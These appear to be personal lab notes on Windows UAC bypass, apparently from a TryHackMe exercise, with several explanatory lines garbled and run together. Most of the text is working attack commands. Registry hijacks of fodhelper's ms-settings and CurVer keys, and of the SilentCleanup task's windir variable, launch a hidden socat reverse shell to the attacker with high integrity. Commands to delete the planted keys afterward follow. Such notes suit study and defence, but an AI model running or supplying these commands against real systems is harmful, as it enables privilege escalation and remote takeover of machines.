Application Information Service, a.k.a Appinfo
ShellExecute API call is made via runas.execonsent.exe, dialogue opens upMandatory Label is shown via whoami /groupsmsconfig, always got integrity level high via auto elevationTools choose Command Prompt and press Launch to get an elevated cmd.exeazman.msc --> Help --> Help Topicsview sourceOpen --> File, select All FilesC:\Windows\System32\cmd.exe and right click on it to open Must be in a trusted dir like Program Files or Windows
Additionaly, portable executables need autoelevate in the manifest. Check via
sigcheck64.exe -m <portable_executable.exe>
mmc.exe autoelevates depending on user request for msc-snapin*.mscs, spinstall.exe, pkgmgr.exe as well as COM objects autoelevateHKEY_LOCAL_MACHINE\Software\Classes which is superseded by the current user profile HKEY_CURRENT_USER\Software\Classesms-settings ProgID is searched for by fodhelper.exe, this setting overrides system defaults of which executable opens the filetypeThe subprocess of fodhelper.exe inherits intergrity level high
Open reverse shell on attacker and
whoami
net user <user> | find "Local Group"
whoami /groups | find "Label"
set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4444 EXEC:cmd.exe,pipes"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings\ /f
$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:$TARGET_IP:4445 EXEC:cmd.exe,pipes"
reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
fodhelper.exe
reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f
%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%%windir% to a reverse shell viareg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:$TARGET_IP:4711 EXEC:cmd.exe,pipes &REM " /f
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
reg delete "HKCU\Environment" /v "windir" /f
Social_engineering